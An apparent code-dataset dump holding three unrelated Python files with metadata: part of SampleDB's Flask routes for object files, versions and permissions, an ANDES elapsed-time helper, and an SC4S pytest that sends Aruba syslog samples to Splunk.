file = logic.files.get_file_for_object(object_id, file_id)
if file is None:
return flask.abort(404)
if file.is_hidden:
return flask.abort(403)
if file.storage in ('local', 'database'):
if 'preview' in flask.request.args:
file_extension = os.path.splitext(file.original_file_name)[1]
mime_type = flask.current_app.config.get('MIME_TYPES', {}).get(file_extension, None)
if mime_type is not None:
return flask.send_file(file.open(), mimetype=mime_type, last_modified=file.utc_datetime)
return flask.send_file(file.open(), as_attachment=True, attachment_filename=file.original_file_name, last_modified=file.utc_datetime)
# TODO: better error handling
return flask.abort(404)
@frontend.route('/objects/<int:object_id>/files/<int:file_id>', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def update_file_information(object_id, file_id):
check_current_user_is_not_readonly()
form = FileInformationForm()
if not form.validate_on_submit():
return flask.abort(400)
title = form.title.data
description = form.description.data
try:
logic.files.update_file_information(
object_id=object_id,
file_id=file_id,
user_id=flask_login.current_user.id,
title=title,
description=description
)
except logic.errors.FileDoesNotExistError:
return flask.abort(404)
return flask.redirect(flask.url_for('.object', object_id=object_id, _anchor='file-{}'.format(file_id)))
@frontend.route('/objects/<int:object_id>/files/<int:file_id>/hide', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def hide_file(object_id, file_id):
check_current_user_is_not_readonly()
form = FileHidingForm()
if not form.validate_on_submit():
return flask.abort(400)
reason = form.reason.data
try:
logic.files.hide_file(
object_id=object_id,
file_id=file_id,
user_id=flask_login.current_user.id,
reason=reason
)
except logic.errors.FileDoesNotExistError:
return flask.abort(404)
flask.flash(_('The file was hidden successfully.'), 'success')
return flask.redirect(flask.url_for('.object', object_id=object_id, _anchor='file-{}'.format(file_id)))
@frontend.route('/objects/<int:object_id>/files/mobile_upload/<token>', methods=['GET'])
def mobile_file_upload(object_id: int, token: str):
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
try:
user_id, object_id = serializer.loads(token, max_age=15 * 60)
except itsdangerous.BadSignature:
return flask.abort(400)
try:
user = logic.users.get_user(user_id)
except UserDoesNotExistError:
return flask.abort(403)
if user.is_readonly:
return flask.abort(403)
return flask.render_template('mobile_upload.html')
@frontend.route('/objects/<int:object_id>/files/mobile_upload/<token>', methods=['POST'])
def post_mobile_file_upload(object_id: int, token: str):
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
try:
user_id, object_id = serializer.loads(token, max_age=15 * 60)
except itsdangerous.BadSignature:
return flask.abort(400)
try:
user = logic.users.get_user(user_id)
except UserDoesNotExistError:
return flask.abort(403)
if user.is_readonly:
return flask.abort(403)
files = flask.request.files.getlist('file_input')
if not files:
return flask.redirect(
flask.url_for(
'.mobile_file_upload',
object_id=object_id,
token=token
)
)
for file_storage in files:
file_name = werkzeug.utils.secure_filename(file_storage.filename)
logic.files.create_database_file(object_id, user_id, file_name, lambda stream: file_storage.save(dst=stream))
return flask.render_template('mobile_upload_success.html')
@frontend.route('/objects/<int:object_id>/files/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_files(object_id):
check_current_user_is_not_readonly()
external_link_form = ExternalLinkForm()
file_form = FileForm()
if file_form.validate_on_submit():
file_source = file_form.file_source.data
if file_source == 'local':
files = flask.request.files.getlist(file_form.local_files.name)
for file_storage in files:
file_name = werkzeug.utils.secure_filename(file_storage.filename)
logic.files.create_database_file(object_id, flask_login.current_user.id, file_name, lambda stream: file_storage.save(dst=stream))
flask.flash(_('Successfully uploaded files.'), 'success')
else:
flask.flash(_('Failed to upload files.'), 'error')
elif external_link_form.validate_on_submit():
url = external_link_form.url.data
logic.files.create_url_file(object_id, flask_login.current_user.id, url)
flask.flash(_('Successfully posted link.'), 'success')
elif external_link_form.errors:
flask.flash(_('Failed to post link.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id, invalid_link=True, _anchor='anchor-post-link'))
else:
flask.flash(_('Failed to upload files.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
@frontend.route('/objects/new', methods=['GET', 'POST'])
@flask_login.login_required
def new_object():
check_current_user_is_not_readonly()
action_id = flask.request.args.get('action_id', None)
previous_object_id = flask.request.args.get('previous_object_id', None)
if not action_id and not previous_object_id:
# TODO: handle error
return flask.abort(404)
sample_id = flask.request.args.get('sample_id', None)
previous_object = None
action = None
if previous_object_id:
try:
previous_object = get_object(previous_object_id)
except ObjectDoesNotExistError:
flask.flash(_("This object does not exist."), 'error')
return flask.abort(404)
if Permissions.READ not in get_user_object_permissions(user_id=flask_login.current_user.id, object_id=previous_object_id):
flask.flash(_("You do not have the required permissions to use this object as a template."), 'error')
return flask.abort(403)
if action_id:
if action_id != str(previous_object.action_id):
flask.flash(_("This object was created with a different action."), 'error')
return flask.abort(400)
else:
action_id = previous_object.action_id
if action_id:
try:
action = get_action(action_id)
except ActionDoesNotExistError:
flask.flash(_("This action does not exist."), 'error')
return flask.abort(404)
if Permissions.READ not in get_user_action_permissions(action_id, user_id=flask_login.current_user.id):
flask.flash(_("You do not have the required permissions to use this action."), 'error')
return flask.abort(403)
placeholder_data = {}
if sample_id is not None:
try:
sample_id = int(sample_id)
except ValueError:
sample_id = None
else:
if sample_id <= 0:
sample_id = None
if sample_id is not None:
try:
logic.objects.get_object(sample_id)
except logic.errors.ObjectDoesNotExistError:
sample_id = None
if sample_id is not None:
if action.schema.get('properties', {}).get('sample', {}).get('type', '') == 'sample':
placeholder_data = {
('sample', ): {'_type': 'sample', 'object_id': sample_id}
}
# TODO: check instrument permissions
return show_object_form(None, action, previous_object, placeholder_data=placeholder_data)
@frontend.route('/objects/<int:object_id>/versions/')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_versions(object_id):
object = get_object(object_id=object_id)
if object is None:
return flask.abort(404)
object_versions = get_object_versions(object_id=object_id)
object_versions.sort(key=lambda object_version: -object_version.version_id)
return flask.render_template('objects/object_versions.html', get_user=get_user, object=object, object_versions=object_versions)
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_version(object_id, version_id):
user_language_id = logic.languages.get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object = get_object(object_id=object_id, version_id=version_id)
form = None
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
if Permissions.WRITE in user_permissions:
current_object = get_object(object_id=object_id)
if current_object.version_id != version_id:
form = ObjectVersionRestoreForm()
user_may_grant = Permissions.GRANT in user_permissions
action = get_action_with_translation_in_language(object.action_id, user_language_id, use_fallback=True)
action_type = get_action_type_with_translation_in_language(action.type_id, user_language_id)
instrument = get_instrument_with_translation_in_language(action.instrument_id, user_language_id) if action.instrument_id else None
object_languages = logic.languages.get_languages_in_object_data(object.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
return flask.render_template(
'objects/view/base.html',
template_mode="view",
show_object_type_and_id_on_object_page_text=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
show_object_title=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
languages=languages,
metadata_language=metadata_language,
ENGLISH=english,
is_archived=True,
object_type=action_type.translation.object_name,
action=action,
action_type=action_type,
instrument=instrument,
schema=object.schema,
data=object.data,
last_edit_datetime=object.utc_datetime,
last_edit_user=get_user(object.user_id),
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
object_id=object_id,
version_id=version_id,
link_version_specific_rdf=True,
restore_form=form,
get_user=get_user,
user_may_grant=user_may_grant,
get_action_type=get_action_type,
get_action_type_with_translation_in_language=get_action_type_with_translation_in_language,
)
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>/restore', methods=['GET', 'POST'])
@object_permissions_required(Permissions.WRITE)
def restore_object_version(object_id, version_id):
if version_id < 0 or object_id < 0:
return flask.abort(404)
try:
current_object = get_object(object_id=object_id)
except ObjectDoesNotExistError:
return flask.abort(404)
if current_object.version_id <= version_id:
return flask.abort(404)
form = ObjectVersionRestoreForm()
if form.validate_on_submit():
logic.objects.restore_object_version(object_id=object_id, version_id=version_id, user_id=flask_login.current_user.id)
return flask.redirect(flask.url_for('.object', object_id=object_id))
return flask.render_template('objects/restore_object_version.html', object_id=object_id, version_id=version_id, restore_form=form)
@frontend.route('/objects/<int:object_id>/permissions')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_permissions(object_id):
check_current_user_is_not_readonly()
object = get_object(object_id)
action = get_action(object.action_id)
instrument = action.instrument
user_permissions = get_object_permissions_for_users(object_id=object_id, include_instrument_responsible_users=False, include_groups=False, include_projects=False, include_readonly=False, include_admin_permissions=False)
group_permissions = get_object_permissions_for_groups(object_id=object_id, include_projects=False)
project_permissions = get_object_permissions_for_projects(object_id=object_id)
public_permissions = Permissions.READ if object_is_public(object_id) else Permissions.NONE
suggested_user_id = flask.request.args.get('add_user_id', '')
try:
suggested_user_id = int(suggested_user_id)
except ValueError:
suggested_user_id = None
if Permissions.GRANT in get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id):
user_permission_form_data = []
for user_id, permissions in user_permissions.items():
if user_id is None:
continue
user_permission_form_data.append({'user_id': user_id, 'permissions': permissions.name.lower()})
group_permission_form_data = []
for group_id, permissions in group_permissions.items():
if group_id is None:
continue
group_permission_form_data.append({'group_id': group_id, 'permissions': permissions.name.lower()})
project_permission_form_data = []
for project_id, permissions in project_permissions.items():
if project_id is None:
continue
project_permission_form_data.append({'project_id': project_id, 'permissions': permissions.name.lower()})
edit_user_permissions_form = ObjectPermissionsForm(public_permissions=public_permissions.name.lower(), user_permissions=user_permission_form_data, group_permissions=group_permission_form_data, project_permissions=project_permission_form_data)
users = get_users(exclude_hidden=True)
users = [user for user in users if user.id not in user_permissions]
add_user_permissions_form = ObjectUserPermissionsForm()
groups = get_user_groups(flask_login.current_user.id)
groups = [group for group in groups if group.id not in group_permissions]
add_group_permissions_form = ObjectGroupPermissionsForm()
projects = get_user_projects(flask_login.current_user.id, include_groups=True)
projects = [project for project in projects if project.id not in project_permissions]
add_project_permissions_form = ObjectProjectPermissionsForm()
copy_permissions_form = CopyPermissionsForm()
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
copy_permissions_form.object_id.choices = [
(str(existing_object.id), existing_object.data['name']['text'])
for existing_object in existing_objects
if existing_object.id != object_id
]
if len(copy_permissions_form.object_id.choices) == 0:
copy_permissions_form = None
else:
copy_permissions_form.object_id.choices = []
else:
edit_user_permissions_form = None
add_user_permissions_form = None
add_group_permissions_form = None
add_project_permissions_form = None
copy_permissions_form = None
users = []
groups = []
projects = []
acceptable_project_ids = {
project.id
for project in projects
}
all_projects = logic.projects.get_projects()
all_projects_by_id = {
project.id: project
for project in all_projects
}
if not flask.current_app.config['DISABLE_SUBPROJECTS']:
project_id_hierarchy_list = logic.projects.get_project_id_hierarchy_list(list(all_projects_by_id))
project_id_hierarchy_list = [
(level, project_id, project_id in acceptable_project_ids)
for level, project_id in project_id_hierarchy_list
]
else:
project_id_hierarchy_list = [
(0, project.id, project.id in acceptable_project_ids)
for project in sorted(all_projects, key=lambda project: project.id)
]
return flask.render_template(
'objects/object_permissions.html',
instrument=instrument,
action=action,
object=object,
user_permissions=user_permissions,
group_permissions=group_permissions,
project_permissions=project_permissions,
public_permissions=public_permissions,
get_user=get_user,
Permissions=Permissions,
form=edit_user_permissions_form,
users=users,
groups=groups,
projects_by_id=all_projects_by_id,
project_id_hierarchy_list=project_id_hierarchy_list,
show_projects_form=len(acceptable_project_ids) > 0,
add_user_permissions_form=add_user_permissions_form,
add_group_permissions_form=add_group_permissions_form,
get_group=get_group,
add_project_permissions_form=add_project_permissions_form,
copy_permissions_form=copy_permissions_form,
get_project=get_project,
suggested_user_id=suggested_user_id
)
@frontend.route('/objects/<int:object_id>/permissions', methods=['POST'])
@object_permissions_required(Permissions.GRANT)
def update_object_permissions(object_id):
edit_user_permissions_form = ObjectPermissionsForm()
add_user_permissions_form = ObjectUserPermissionsForm()
add_group_permissions_form = ObjectGroupPermissionsForm()
add_project_permissions_form = ObjectProjectPermissionsForm()
copy_permissions_form = CopyPermissionsForm()
if 'copy_permissions' in flask.request.form:
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
copy_permissions_form.object_id.choices = [
(str(existing_object.id), existing_object.data['name']['text'])
for existing_object in existing_objects
if existing_object.id != object_id
]
else:
copy_permissions_form.object_id.choices = []
if copy_permissions_form.validate_on_submit():
logic.object_permissions.copy_permissions(object_id, int(copy_permissions_form.object_id.data))
logic.object_permissions.set_user_object_permissions(object_id, flask_login.current_user.id, Permissions.GRANT)
flask.flash(_("Successfully copied object permissions."), 'success')
elif 'edit_user_permissions' in flask.request.form and edit_user_permissions_form.validate_on_submit():
set_object_public(object_id, edit_user_permissions_form.public_permissions.data == 'read')
for user_permissions_data in edit_user_permissions_form.user_permissions.data:
user_id = user_permissions_data['user_id']
try:
get_user(user_id)
except UserDoesNotExistError:
continue
permissions = Permissions.from_name(user_permissions_data['permissions'])
set_user_object_permissions(object_id=object_id, user_id=user_id, permissions=permissions)
for group_permissions_data in edit_user_permissions_form.group_permissions.data:
group_id = group_permissions_data['group_id']
try:
get_group(group_id)
except GroupDoesNotExistError:
continue
permissions = Permissions.from_name(group_permissions_data['permissions'])
set_group_object_permissions(object_id=object_id, group_id=group_id, permissions=permissions)
for project_permissions_data in edit_user_permissions_form.project_permissions.data:
project_id = project_permissions_data['project_id']
try:
get_project(project_id)
except ProjectDoesNotExistError:
continue
permissions = Permissions.from_name(project_permissions_data['permissions'])
set_project_object_permissions(object_id=object_id, project_id=project_id, permissions=permissions)
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_user_permissions' in flask.request.form and add_user_permissions_form.validate_on_submit():
user_id = add_user_permissions_form.user_id.data
permissions = Permissions.from_name(add_user_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_users(object_id=object_id, include_instrument_responsible_users=False, include_groups=False, include_projects=False, include_admin_permissions=False)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert user_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_user_object_permissions(object_id=object_id, user_id=user_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_group_permissions' in flask.request.form and add_group_permissions_form.validate_on_submit():
group_id = add_group_permissions_form.group_id.data
permissions = Permissions.from_name(add_group_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_groups(object_id=object_id)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert group_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_group_object_permissions(object_id=object_id, group_id=group_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_project_permissions' in flask.request.form and add_project_permissions_form.validate_on_submit():
project_id = add_project_permissions_form.project_id.data
permissions = Permissions.from_name(add_project_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_projects(object_id=object_id)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert project_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_project_object_permissions(object_id=object_id, project_id=project_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
else:
flask.flash(_("A problem occurred while changing the object permissions. Please try again."), 'error')
return flask.redirect(flask.url_for('.object_permissions', object_id=object_id))
| sampledb/frontend/objects.py | 110,241 | Return all objects
coding: utf-8 ensure old links still function default objects per page TODO: ensure that advanced search does not cause exceptions TODO: error handling/logging? Ignore invalid placeholder data The form allows notations like '1.2e1' for '12', however Python can only parse these as floats The object name might need the batch number to match the pattern TODO: proper logging TODO: handle error Set view attributes Sort by: instrument name (independent actions first), action name form kwargs The form allows notations like '1.2e1' for '12', however Python can only parse these as floats Sort by: instrument name (independent actions first), action name TODO: better error handling TODO: handle error TODO: check instrument permissions | 754 | en | 0.64156 |
from decimal import Decimal, ROUND_DOWN
from time import time
def elapsed(t0=0.0):
"""get elapsed time from the give time
Returns:
now: the absolute time now
dt_str: elapsed time in string
"""
now = time()
dt = now - t0
dt_sec = Decimal(str(dt)).quantize(Decimal('.0001'), rounding=ROUND_DOWN)
if dt_sec <= 1:
dt_str = str(dt_sec) + ' second'
else:
dt_str = str(dt_sec) + ' seconds'
return now, dt_str
| andes/utils/time.py | 477 | get elapsed time from the give time
Returns:
now: the absolute time now
dt_str: elapsed time in string | 111 | en | 0.616296 |
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
import pytest
env = Environment()
# time format for Apr 5 22:51:54 2021
# <187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3.
# <187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory.
# <188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1.
# <191>{{ arubadate }} 10.10.10.10 dnsmasq: reading /etc/resolv.conf
testdata = [
"<187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3.",
"<187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory.",
"<188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1.",
"<188>{{ arubadate }} {{ host }} sapd[1362]: <127037> <WARN> |AP 00:0b:86:eb:4e:32@10.10.10.10 sapd| |ids-ap| AP(04:bd:88:8a:3a:60): Station Associated to Rogue AP: An AP detected a client a4:8d:3b:ae:68:68 associated to a rogue access point (BSSID 98:1e:19:31:63:b6 and SSID MySpectrumWiFib0-2G on CHANNEL 11).",
]
@pytest.mark.parametrize("event", testdata)
def test_aruba(
record_property, setup_wordlist, get_host_key, setup_splunk, setup_sc4s, event
):
host = get_host_key
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
arubadate = dt.strftime("%b %d %H:%M:%S %Y")
# Tune time functions
epoch = epoch[:-7]
mt = env.from_string(event + "\n")
message = mt.render(mark="<188>", bsd=bsd, host=host, arubadate=arubadate)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
'search index=netops _time={{ epoch }} sourcetype="aruba:syslog" host={{ host }}'
)
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
| tests/test_aruba.py | 3,309 | Copyright 2019 Splunk, Inc. Use of this source code is governed by a BSD-2-clause-style license that can be found in the LICENSE-BSD2 file or at https://opensource.org/licenses/BSD-2-Clause time format for Apr 5 22:51:54 2021 <187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3. <187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory. <188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1. <191>{{ arubadate }} 10.10.10.10 dnsmasq: reading /etc/resolv.conf Tune time functions | 1,086 | en | 0.588242 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.